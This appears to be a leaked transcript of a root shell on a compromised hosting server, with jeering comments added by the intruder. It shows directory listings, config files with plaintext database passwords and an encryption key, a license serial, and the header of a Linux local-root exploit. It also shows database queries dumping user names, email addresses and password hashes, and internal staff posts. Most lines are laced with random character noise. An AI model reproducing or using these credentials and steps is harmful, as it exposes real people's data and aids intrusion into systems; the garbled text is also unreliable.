1 D( m9 Z+ O+ X7 G/ N6 s% Z4 _2 @* x-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout6 p) o9 m. s& Z8 ^* \
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile$ g3 w6 N8 a; ?- t
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc, s. f4 z2 ]. P+ W
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains
# ?7 h! o  t# Fdrwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap- X7 \( D7 T. }
drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
7 X+ f3 L7 M& C& H-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
! E( T% ~, x/ `9 Slrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
, Z' o4 R. k/ ^! a) z-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
. K6 E0 [! Q1 h6 F% v; b
8 d( N0 H. d3 i+ C9 X# Nsh-3.2# cd auth/5 u8 _& Q2 D; P: q  X' `# v( g
sh-3.2# ls -la
! l9 w2 A/ I. L  e. e' M7 Ktotal 28( ]; \3 J$ y0 x+ B3 y
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .3 @8 y/ O6 \3 k0 |. w; @
drwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..$ W/ v1 e' A9 h
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
; u5 N/ D9 I" ?0 ~& d5 I0 h8 W& q-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
; p" E9 V8 s0 P# v% O* o-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
, s. j7 M  D6 B$ }" [-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting
: L! x/ \3 }& L( q: T0 `6 v-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd
9 \: o$ ^+ n2 w4 C2 ]  l6 {- X( g; V) t; N0 i4 `# s& p  M% t
sh-3.2# cat hackercontest.config.inc.php& @6 Y; z" i( h/ T
<?PHP' Z: ~: \( r- m( Y
// Variabeln f?r Verbindung zur Datenbank //" @, a7 q, y: K& t
$conxHost = ‘localhost’;                       // MySQL hostname9 {3 T$ Q& b8 h8 Z. d
$conxUser = ‘hackercontest’;                                       // MySQL user  p6 P6 Z8 k, i& n! x
$conxPassword = ‘K6m@7dUc’;                    // MySQL password& i; K* C' S: `5 t" V  a, x' n
$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
- A- F/ C; M. S% o4 r" V# ?" e?>
- C, N2 n4 j$ V! Ush-3.2# cat hosting.config.inc.php
8 e* C, z5 s4 ]/ G8 A<?PHP( i: I5 |, m2 g! X% r8 P
// Variabeln f?r Verbindung zur Datenbank //
0 w2 T( r3 q5 `, u( j: J0 B$conxHost = ‘localhost’;                       // MySQL hostname
; n0 r4 \* k1 k' _; ]; q$conxUser = ‘hostinguser’;                                 // MySQL user7 n) Q* `# O# D5 c) \# Z
$conxPassword = ‘cXvB3981′;                    // MySQL password
7 h$ W( k% _  P- K1 t$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
7 r" i/ E+ T3 J8 c3 F; W0 X?>% h9 I7 I& U, n

8 A  B8 @. F0 G, Z  [sh-3.2# cd ..- e9 R$ J. r( o5 z( u$ s8 N0 S
sh-3.2# cd com
$ U0 G: _, I+ K. e/ R" xsh-3.2# ls -la" K' {+ t1 C! F* g
total 141208
) X* `% e+ i6 Qdrwx–x–x 10 com  com       4096 Apr 28 12:40 .9 |; |9 t! W2 u1 ~
drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..+ t3 h( e# S* j" F
drwx——  2 com  com       4096 Jun  4 04:04 backups
- E! \9 a. e  o& W-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
% J) }. W2 E7 pdrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system( b* w; A1 ?; t! q' Y5 E3 o
-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history
! t8 j, I3 B/ S9 K0 w) T-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout; u" |/ C  {( q% b2 ~' L! A
-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile
& x2 N" a( E. }9 F4 X-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc3 ^0 h0 n4 Z* L- m6 u9 ^
drwx–x–x  3 com  com       4096 Jan 29  2008 domains; d5 m. q; q4 |2 I: ]
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed& C" D  B  k- @3 p  c
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap+ ?$ Q& r$ T. z7 L2 o0 q
-rw——-  1 com  com         69 Nov 18  2008 .lesshst
  n  I% q; T+ k  E# Sdrwx——  2 com  com       4096 Sep 24  2007 mail
! T% M% g4 r$ d5 I7 P-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history
5 c. z2 G7 S7 i9 h; }drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp* U. u, z" p" |5 Q- H/ }7 o* X
lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
4 g# h! n  J4 S. L* u-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow
: E+ F* x/ e# R4 e' @8 Ndrwx——  2 com  com       4096 Aug 26  2008 .ssh. O, T: ~- r& Q7 K  p  X
-rwx——  1 com  com       8515 Feb 10  2008 t4 z, [* N7 h" ]3 ]
-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c
, u$ e% J9 l. v, U2 Pdrwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp) I1 ^7 f: B- R2 T& V
-rw-rw-r–  1 com  com        617 May 20  2008 .toprc" f) q3 f$ u0 |/ D% ?% L& o  E
-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
3 c9 U2 Z: C/ q$ r/ A* b4 p-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo* H; C- N- p3 k9 R9 o) S
-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc" g, q, j: h$ h

5 z% V, g* a; l- rsh-3.2# head t.c
4 Y4 g1 m  [/ d7 j# Z/*' ~+ ?1 h- X! k( d6 J3 I
* jessica_biel_naked_in_my_bed.c
# m; v4 ^# v/ {1 i*
& H& [  m3 H" f/ f3 _3 k  `* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
6 O6 h& K3 |7 L8 s2 k5 H* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.0 @. _4 b9 h! A  L
* Stejnak je to stare jak cyp a aj jakesyk rozbite.% @+ A! `* k1 F# X) G/ R- _3 k- u
*
+ ~. B- X, m6 @+ u" s9 r* Linux vmsplice Local Root Exploit# d# Z  d- U, Y( e! c0 W  g, V* Q+ G
* By qaaz; K5 F7 Y. A0 S
*4 N# }7 w$ S! n
% \% B5 P$ Y4 ^" @5 @) f' m. ^
sh-3.2# cd /7 L" Y- R0 T! x% C7 m. v
sh-3.2# ls -la* P& N* C. n% e  w* I
total 360
9 }4 n" x5 U; t9 ~9 r* ]' T  Pdrwxr-xr-x  25 root root   4096 Jun  3 02:43 .
# d3 x: }* G# G# `drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
: A9 l* }! b+ L4 [) D8 }-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
6 f0 x" A5 e! A7 F  o0 n-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
1 l/ D+ s7 b: T2 j- Z( y6 V-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db
% r# i# C  y: ~9 s9 R$ }" m-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck
# _5 G1 }" g- [) K-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
  u: Z5 W5 Q4 b3 D& @; i! vdrwxr-xr-x   3 root root   4096 Dec 29  2007 backup
/ Q3 {5 K! n. bdrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin
" |+ o1 q1 E! }2 d4 D/ \6 Edrwxr-xr-x   5 root root   4096 Jun  2 14:06 boot% t. B4 o, o7 t- n3 l
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
/ I' m& ~* Q3 e( zdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc
8 L6 D0 d( a- u1 K6 ~drwxr-xr-x  14 root root   4096 Mar 11 17:56 home- E& G* C5 D4 A! u5 e: [% E
-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf! ]! R, M4 i* u: i4 i3 D
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib7 m' S; v- v9 u1 q# d- Q  N' Y
drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
" k1 Z' ?8 I/ F) idrwx——   2 root root  16384 Sep 11  2007 lost+found
2 x( P% ~. H) H# `5 k+ h. k) Pdrwxr-xr-x   2 root root   4096 Mar 11 17:56 media
! G9 t4 _6 z1 ^# }1 j0 Z" e2 tdrwxr-xr-x   2 root root      0 Jun  3 02:43 misc
6 w- H* ?% y8 a2 Edrwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt' u  b" Z- d) d$ |
-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg# Y, c7 \  E, ~1 ^# l* h% }) }
drwxr-xr-x   2 root root      0 Jun  3 02:43 net/ p1 j# E, c% J* v8 T  |
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
1 w# p$ V- R! o) e* R% w" M* E: ndr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
  |9 S; U4 o& d/ |8 bdrwxr-x—  15 root root   4096 Jun  4 08:40 root
6 u# A7 L+ }: X. Gdrwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin* t( z3 d1 `: J% `# J& V
drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux, x- C) Y4 B- P: s8 }
drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
* m& ^1 E/ X- K+ x0 k0 edrwxr-xr-x  11 root root      0 Jun  3 02:42 sys" K' p( s; b5 g6 M9 V
drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp
8 d4 R6 \+ w$ rdrwxr-xr-x  16 root root   4096 Jun  2 13:56 usr+ G9 w" ~  ?. n9 Y
drwxr-xr-x  26 root root   4096 Jun  4 03:16 var) w% G, o8 f5 n! _
% e! J2 t* [2 z& ]3 k9 V  {
sh-3.2# cd opt
3 J  {  W6 d6 \$ o3 ]8 Ysh-3.2# ls -la
+ j# |7 h& A) I. S- [total 20+ o6 p7 F& K6 Q: T0 X; V
drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
) L8 L2 t# I: u' {9 idrwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
- x2 f2 X: i, S3 d( D# P  rdrwxr-xr-x 15 root root 4096 Mar 20  2008 lsws, @1 W  v; ?! K

) [9 D# k- K6 X) [* K) B/ C0 l% ^( Esh-3.2# cd lsws/
" u- a6 b4 o4 `' O. }9 ]& |sh-3.2# ls -la
2 F$ F/ S$ ~4 |total 108
  l3 e5 q  U; Q) Qdrwxr-xr-x 15 root   root    4096 Mar 20  2008 .& x; K  I  A" H% \% l
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..) N6 [* H) _5 K1 q6 C
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
; W; J0 K% X0 ?% a3 s! o. u/ xdrwxr-xr-x 13 root   root    4096 May 29 15:10 admin6 r3 Q: W8 |  E# J3 V
drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
! `  S0 a3 U( q& Y) udrwxr-xr-x  2 root   root    4096 May 29 15:10 bin/ C5 X0 H4 y' Q1 S( ^: v
drwx——  4 apache apache  4096 Jun  3 02:43 conf" O8 d; g! x" Y7 S% o0 c9 \6 o
drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT1 F+ G1 N6 X  s2 W
drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs1 m! Y! ^. {- }  h
drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
( N( n$ k! z) udrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
4 P- b" K0 ], l- r6 w  ~! I" q; _-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE
" S/ K( l/ d/ T6 u1 m-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP' ^5 S# D% e: E
-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL  D$ C. i# a/ C- f: P: v* v8 w' U
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP9 f* D( o7 G: J9 h- ~# s
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs
7 ]. |1 P8 {. N# j2 w1 Adrwxr-xr-x  2 root   root    4096 Mar 20  2008 php
1 T. {% T, P% v$ r% P1 t' z* o7 ?drwx——  2 apache apache  4096 Mar 20  2008 phpbuild
2 S# T) u. e% c2 idrwxr-xr-x  3 root   root    4096 Mar 20  2008 share4 r+ D& F. S. R+ e% I, w- M
-rw-r–r–  1 root   root       6 May 29 15:10 VERSION
/ q/ K5 ]' p0 o* l/ v6 P/ l8 r: Z8 {! A, L+ C0 n
sh-3.2# cd conf
5 z5 Q/ M, O0 [. u8 ^sh-3.2# ls -la; `7 s' V& y$ z+ B
total 48
3 s# Y3 ]  N0 Pdrwx——  4 apache apache 4096 Jun  3 02:43 .
0 _) ]7 a' I: q8 Bdrwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
3 s/ ?! a* U' ?6 Q: o3 P, G+ s7 p* Mdrwx——  2 apache apache 4096 Mar 20  2008 cert
! }7 h) L! O+ [$ B  N4 X-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml
( S8 s. T% |& \9 ^# T0 u-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
( }) G% ]0 }' V/ k: g-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last* @+ W. ^! P& [
-rw——-  1 apache apache  256 May 29 15:10 license.key
8 D7 N) L1 p, v0 \" V: ~7 _2 z-rw——-  1 apache apache  256 Mar 21  2008 license.key.old% t0 n5 M$ ]7 T, y2 @. i2 N
-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties6 o2 C- \$ ~$ z, Z1 ?! }& U% i9 U! ?
-rw——-  1 apache apache   20 May 29 15:10 serial.no
1 i! a6 J" k( f# H6 J6 ddrwx——  2 apache apache 4096 Mar 20  2008 templates  W9 K2 y. U" S* J6 m% t

8 P7 F) f3 G& {. g7 Ush-3.2# cat serial.no
0 M" I( u& K! L* O4 sIbDl-oVsO-CKqL-wVRa" ?% h6 a# V! ~! @8 F% A
& }3 b' y, e. w/ v4 V; _& E0 X( a% N
sh-3.2# mysql
' k9 K. S* _8 G4 d: DWelcome to the MySQL monitor.  Commands end with ; or \g.7 K% `8 N% N% C9 l, q
Your MySQL connection id is 286844
7 P/ y: _: P+ N' ?Server version: 5.0.45-community-log MySQL Community Edition (GPL)
1 Y- t2 l/ i! F! m* Y$ j. j! X/ n  W$ ?4 @4 E* c, ^6 C
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; s/ Q( I+ R+ k& O* j" I( s( L7 D9 R" d
4 x" G% t- W: M3 [4 h
mysql> show databases;
$ p2 u/ r- Z0 w5 T" b5 q, x% |+———————–+
- d9 _; c0 r9 ]8 q* P: v! T- U' c| Database              |
8 ?* p: l. y- `2 V! |' S& U+———————–+# z4 X7 }; G; v  {
| information_schema    |
( H4 F2 C- b) k| astanet_ads           |8 h' a7 g; O$ ?. K0 r" K
| astanet_mailing_lists |4 V9 v% }' ]0 }7 N* E3 l
| astanet_mediawiki     |
$ N, n( `) U# ]! || astanet_membersystem  |
" X# e6 ?$ K' y3 ~& U! Q$ n/ V| com_contrexx          |
! l1 r7 U. d# i. \. \6 G' G| com_contrexx2         |3 c- N' F* ~* m) H0 g: }
| com_contrexx2_live    |- [, y) M2 F) \6 @
| da_roundcube          |8 q8 E7 x' t2 w) l0 {) H& C& c5 U
| dolphin               |
" B; f# u( L$ {' Q* e* U; q0 A| ideapool              |9 ]8 A4 G0 i& y& L& F! b, u% N
| mysql                 |' ^; I0 p( x: i$ M; K$ t. E5 ]
| test                  |
& m% C  b. A4 [1 e$ {4 ~  l* b| yourmaster            |
1 X9 g$ E' S- I8 E5 U, y& [+ g+ d  q+———————–+
7 I6 X1 l( B& ]14 rows in set (0.00 sec)2 R; [: G9 A2 U4 O  K" E
) l: P# h" K: I4 Q# W5 G
mysql> use ideapool/ B. @7 O% |/ M7 I% I0 R& y4 T4 j
Database changed
' {; s9 t- ]" C: d; Mmysql> show tables;8 A7 N6 Z# A3 k2 ]2 Z
+———————————–+
4 w  a+ \- A5 S' k| Tables_in_ideapool                |
* C% Q, D) m$ C+———————————–+
" @: _" ]3 b$ {| eventum_columns_to_display        |- O" u" g$ E! E" C
| eventum_custom_field              |
9 u; h  x! [( m0 b7 n| eventum_custom_field_option       |
4 e  {" x7 Q; k0 b2 Y7 X; V4 n| eventum_custom_filter             |
& M2 i/ K: ^& Q6 O; W) K| eventum_customer_account_manager  |
& E, @& ]4 {/ V; `, V% d7 v| eventum_customer_note             |$ v0 g8 r$ s! O+ p, x# z
| eventum_email_account             |( J% i4 G/ ?6 ]
| eventum_email_draft               |
+ {, w7 X! @5 E/ a2 T% C| eventum_email_draft_recipient     |6 }3 U) h( o3 |  k
| eventum_email_response            |' {0 U: ~" d, f" }5 d. b
| eventum_faq                       |
; _, J5 T- U$ `| eventum_faq_support_level         |
" Z/ ^& O$ g  |! e| eventum_group                     |+ d. M0 t& B& L7 f
| eventum_history_type              |
# T; z$ x% Y  m& T| eventum_irc_notice                |6 ~; I" g% v/ x" u
| eventum_issue                     |" x. m' x4 o- @$ T
| eventum_issue_association         |2 ^2 O4 X; o* M2 C0 V3 @
| eventum_issue_attachment          |, T3 d1 s5 B' H6 r9 [! P
| eventum_issue_attachment_file     |
. {: H1 q4 `- D4 H9 @- b% I$ W| eventum_issue_checkin             |' ]; Q8 B) X/ y1 k
| eventum_issue_custom_field        |, ]7 U0 S- G3 K2 Z0 {5 u  b
| eventum_issue_history             |' |% ?& F" N' d) \2 r
| eventum_issue_quarantine          |
& o: \; u3 O3 j, |& N' H! ?| eventum_issue_requirement         |4 X* Q% |. K% \& D8 b  Z, d
| eventum_issue_user                |( q0 a& T( O& U( @& D- m# j
| eventum_issue_user_replier        |
7 ^3 D& W% ^$ E! n; _9 x* j( S| eventum_link_filter               |
1 S, G2 ^7 {; W3 W, w| eventum_mail_queue                |
/ j! p* n* K% J| eventum_mail_queue_log            |
$ [$ I, |0 E: z  U" ]| eventum_news                      |
0 p- S* R/ H* s( X. x2 [: R* l| eventum_note                      |
) o9 d- [7 p' ^5 u7 H& ~' Y| eventum_phone_support             |
6 b; [0 N; M! D6 }| eventum_project                   |( g5 J4 s( V+ a4 z+ d6 D5 o
| eventum_project_category          |! u; E6 C' c: u; i4 T0 M
| eventum_project_custom_field      |
  }# Q7 k! L  ^) q! ^" I| eventum_project_email_response    |  t" ]1 a9 Z- J
| eventum_project_field_display     |
5 z( u6 u! {" s/ H' n/ ^/ T/ K| eventum_project_group             |
) N' b0 O  Y; T! g. q! l) ?9 {/ r| eventum_project_link_filter       |
8 M* j- M8 y# m2 P( L| eventum_project_news              |' U# b, {: f& F; E- d9 x' r
| eventum_project_phone_category    |
+ e* s% K0 j8 [9 I4 N' d$ g| eventum_project_priority          |
. x$ w, H: {4 A# U2 s- j| eventum_project_release           |7 t- U+ P6 `: [' k3 o+ S
| eventum_project_round_robin       |
0 C( p' @; W8 {4 p5 ?9 P, c* {' y| eventum_project_status            |
: _' M3 V0 o. y) K: j4 a| eventum_project_status_date       |
) ~6 `6 ?' I. ^; ?| eventum_project_user              |
# `# M9 Z+ P% T| eventum_reminder_action           |
4 E* L% W# u$ `  Z# x* }# [' G| eventum_reminder_action_list      |9 V$ e9 \% E8 _
| eventum_reminder_action_type      |
3 U: W' Q' o7 L# W| eventum_reminder_field            |. Z% @, V# f* G* f8 i& t
| eventum_reminder_history          |2 ?2 k3 F: c# j
| eventum_reminder_level            |
2 a8 r  M9 Y  @( W. v$ |$ C) V| eventum_reminder_level_condition  |7 l7 `7 W( g0 M4 n$ Z5 W8 N$ e
| eventum_reminder_operator         |
$ M5 q% m9 ^) N3 u* ]| eventum_reminder_priority         |$ y' T* d7 t) G4 V
| eventum_reminder_requirement      |, x- W0 G. d% T
| eventum_reminder_triggered_action |# f! S) b; f+ D+ j
| eventum_resolution                |! |5 B- R/ n/ p* A- s: t% R
| eventum_round_robin_user          |8 ~/ i' q$ t7 C* c; n% O
| eventum_search_profile            |
8 k+ T7 _6 }8 x  s| eventum_status                    |
3 n/ ^  D4 [+ z+ Q# I3 v| eventum_subscription              |
1 M  l. m" N: }8 e7 B| eventum_subscription_type         |
+ V- S: ~# P* s/ I| eventum_support_email             |: Y  t2 W" t+ a2 P5 ^
| eventum_support_email_body        |' Y8 j. Y! z# {# j9 |  Y
| eventum_time_tracking             |
% s6 X' g* _2 D4 t0 v; s| eventum_time_tracking_category    |5 _: J/ R5 e5 L. x* j0 v
| eventum_user                      |
7 F7 j. S( \/ w* W  f+———————————–++ _3 p) E% x" l! K. P
69 rows in set (0.00 sec)
! j0 t4 o8 O. q3 y8 Z) `% u$ L' M- W; L6 H, [* T
mysql> describe eventum_user;
) J" m/ O( |7 c. `1 F+————————-+——————+——+—–+———————+—————-+
, B( y  A' B6 a$ k6 d. r' F| Field                   | Type             | Null | Key | Default             | Extra          |, z+ p$ s6 C4 _: M0 J* F7 p
+————————-+——————+——+—–+———————+—————-+
: _! [9 ~) n/ z  _- J2 t8 N| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |! _7 r$ j$ t8 N! _
| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |( ~2 \* T8 u* l2 v- u4 E6 m: H7 e- `
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |" `9 P# n9 p" \. F4 B6 j
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |9 m' ?7 K/ l" L. M
| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |
" f! X7 H  Z6 Y5 d4 N| usr_status              | varchar(8)       | NO   |     | active              |                |
6 g6 z5 L$ }' T+ D| usr_password            | varchar(32)      | NO   |     |                     |                |
9 ~4 ^2 F1 Z: H& a/ x| usr_full_name           | varchar(255)     | NO   |     |                     |                |7 [: x% b! ?# F1 E4 \$ ?3 r. @
| usr_email               | varchar(255)     | NO   | UNI |                     |                |
; c8 _+ @/ U; |0 c| usr_preferences         | longtext         | YES  |     | NULL                |                |# @, Z" F4 {  c4 m8 G/ i
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
' ?& l) I5 I$ U+ b% \  c0 K4 j| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |2 v, N0 q0 G2 L9 X% ]! V+ J+ B
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |* v( _0 b5 u- M+ h
+————————-+——————+——+—–+———————+—————-+
' n5 N5 x0 n( j: O6 ?2 G: i) _13 rows in set (0.00 sec)0 \0 ^( _" G& L9 A, z
8 t  P& c8 R& H% }6 q, G
mysql> select usr_full_name,usr_email,usr_password from eventum_user;+ d3 t/ ]& U* t" R  n. G& s
+———————-+——————————-+———————————-+
) |3 g$ S% q0 ^+ @; a. u| usr_full_name        | usr_email                     | usr_password                     |  h7 P, f, X  ~; u& e! K
+———————-+——————————-+———————————-+
) i% A! T2 J- I# r2 h2 || system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |4 k, g  B( _  S
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
% L; E0 z# H) u6 M, f2 \. d% X| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
# J3 ?9 K& v5 N! Y| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
' `, P0 q4 s  H| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |7 s7 K7 I7 j1 D. [
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |
. r% L* F) a8 G| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
; Z6 F+ e# w3 a/ c0 }| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |
, d+ N8 [' s% j3 W* \| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |
! W3 ?/ T, ?# W+ i9 Q( O. j| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |  s( c; Y7 J, C& q& A2 G
| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |9 d: |$ Y' s6 {3 O9 Q: g# K
| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |
, e' }9 I$ y- D) }' ~| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |( D" D  J( h8 ]8 U5 E0 x
| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |
6 d% b1 t8 t+ u: F1 L  D1 R| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |+ D  L- X: P$ q+ y! K# o- |
+———————-+——————————-+———————————-+
8 M, t2 r) V; W: |15 rows in set (0.00 sec)7 j& b% y# l: B& k% l# H0 O; T7 J
: S5 `: P* r3 x* M$ d" ^; L
mysql> select iss_description from eventum_issue where iss_id = 43;
. Q' I. t9 G7 Y% K3 O" r+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+0 o! _% N$ ^$ O7 o* H
| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
# F/ k* G, }& |3 B1 ~" t9 z|5 {: e1 \6 S7 q5 h
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+5 g  S2 J9 e' `0 R) o5 M' _
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be$ t: ]8 z  O0 @9 ?  B# h" W$ A
connected for 90 mins… 120mins… so what i propose is something like:
/ V; m. q; x/ T& G4 L% _4 o+ W链接标记[url]http://www.surfthechannel.com/[/url]
3 ?; O+ E2 Q9 K/ hsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
0 l* L: }% ?: S3 y( X. slike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t" _# g1 T! K4 N( |: \
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off3 t6 e- v3 H. r8 i9 H# s
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…  a% C* e' V5 {/ P9 L! o
* M/ [2 ?  h8 i0 x  N4 P
We could also put advertisement during play on the flash video player itself… extra $$…
9 f" @9 K; U4 N( j# x
  w, ~5 ?  e: h( {By sykadul |
% a2 f7 w$ E# f+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
  ~9 u& h1 H% r1 row in set (0.00 sec)! }8 o1 e! T1 D/ Y# L1 A  H$ Q

4 D# u' N( M5 h// Money and extra $$ is all they care about. remember that.
/ X6 w; I9 k) @* D+ G3 _" A7 v
8 ?& M. z7 U! \7 A% t% f9 t6 xmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;/ R* X% a* }  i* `( O
+————————+——————————————————————————————————————————————————————————————————————————————-+
/ u/ o, a7 K" Z' @- v| iss_summary            | iss_description                                                                                                                                                                                                                          2 x; ~( \, l& M/ _
|
# s9 r7 D% d1 G7 h* V: b' _+————————+——————————————————————————————————————————————————————————————————————————————-+4 t5 M0 W& u; L! \6 R  T3 N
| Forum for REAL EXPERTS | Hello,
: P* P+ Y7 T7 ?; \+ X! B" c
! V9 C- e% J$ gIshtus and I,
# h9 y' t1 ?9 J/ u( _' N) Z. ]
) }0 B# U. X1 D" u9 Y' l: YCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide/ I) c3 ~) S3 B' }
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..- s" Q4 a* w6 O/ z1 E

4 y% ]  Z" t. d! E" GOne example a friend of mine from coresecurity.com!
8 ~; ?$ W; V' w' c9 }  u& z5 ?
! x7 w: Y: v, n# Z" s5 ?. TWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
1 N2 X# t: x" U: ]
2 C1 P6 _/ k" X|
) d) V7 r' E; _7 b+————————+——————————————————————————————————————————————————————————————————————————————+8 a8 p% G4 w  M! k2 O
1 row in set (0.00 sec), N  z: J9 g0 N1 ^5 J8 s6 t

# e5 v" G, ]% l- |- p5 Q. Q1 x8 K// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…3 `; `3 I# F. u0 Y# a

6 i7 Y" l, W% }% ?) Jmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;; F% d) O% `( n" S
+——————+———————————————————————————————+
